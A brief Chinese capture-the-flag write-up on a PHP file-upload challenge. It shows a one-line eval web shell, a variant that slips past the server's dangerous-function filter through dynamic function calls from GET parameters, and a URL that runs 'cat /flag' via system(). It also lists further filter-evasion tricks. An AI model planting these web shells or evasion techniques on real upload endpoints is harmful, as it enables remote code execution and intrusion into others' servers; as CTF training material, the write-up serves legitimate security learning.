思路

网页有上传文件的入口，先尝试上传一个一句话木马

<?php eval($_POST['cssec']); ?>

网页提示

服务器检测到文件包含危险内容，启动了查杀程序。

对危险内容的检验，修改一句话木马为

<?php $_POST['cssec']; ?>

这样可以成功绕过，说明是对可以命令执行的危险函数的过滤，改为

<?php $_GET['func']($_GET['args']); ?>

连接木马

http://ctf.seek2.top:32853/uploads/exp1.php?func=system&args=cat%20/flag

得到flag，也可以尝试其它免杀方式，包括使用反序列化知识，chr()，字符串拼接等等